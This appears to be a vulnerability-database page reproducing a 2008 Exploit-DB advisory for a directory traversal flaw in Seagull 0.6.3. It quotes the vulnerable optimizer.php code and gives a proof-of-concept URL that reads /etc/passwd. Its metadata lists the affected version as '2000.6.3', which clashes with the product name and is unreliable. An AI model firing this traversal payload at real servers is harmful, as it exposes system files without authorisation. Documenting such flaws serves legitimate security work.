Seagull STABLE 0.6.3

vendor:

Seagull STABLE

by:

milw0rm.com

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Seagull STABLE

Affected Version From: 2000.6.3

Affected Version To: 2000.6.3

Patch Exists: YES

Related CWE: N/A

CPE: a:seagull_project:seagull

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'files' parameter to '/optimizer.php' script. A remote attacker can send a specially crafted HTTP request with directory traversal sequences to view arbitrary files on the vulnerable system.

Mitigation:

Input validation should be used to prevent directory traversal attacks.

Source

Exploit-DB raw data:

              __fuzion___    ____     
       ______/   \__//   \__/____\    
     _/   \_/  :           //____\\   
    /|      :  :  ..      /        \  
   | |     ::     ::      \        /  
   | |     :|     ||     \ \______/   
   | |     ||     ||      |\  /  |    
    \|     ||     ||      |   / | \   
     |     ||     ||      |  / /_\ \  
     | ___ || ___ ||      | /  /    \ 
      \_-_/  \_-_/ | ____ |/__/      \
                   _\_--_/    \      /
                  /____             / 
                 /     \           /  
                 \______\_________/   


Product:
Seagull STABLE 0.6.3
http://seagullproject.org/

Vulnerable:
optimizer.php; line 61

        // get files and it's mod time
        if (!empty($_GET['files'])) {
            $filesString = $_GET['files'];
            $aFiles = explode(',', $_GET['files']);
            foreach ($aFiles as $fileName) {
                if (is_file($jsFile = dirname(__FILE__) . '/' . $fileName)) {
                    $this->aFiles[] = $jsFile;
                    $lastMod = max($lastMod, filemtime($jsFile));

PoC:
http://pentest.localhost/seagull-0.6.3/www/optimizer.php?files=../../../../../../../../etc/passwd

Greetings to:
d3hydr8, whoami, beenu, kasi, MosDef, etc
Everyone at darkc0de.com & rootmybox.org

# milw0rm.com [2008-01-24]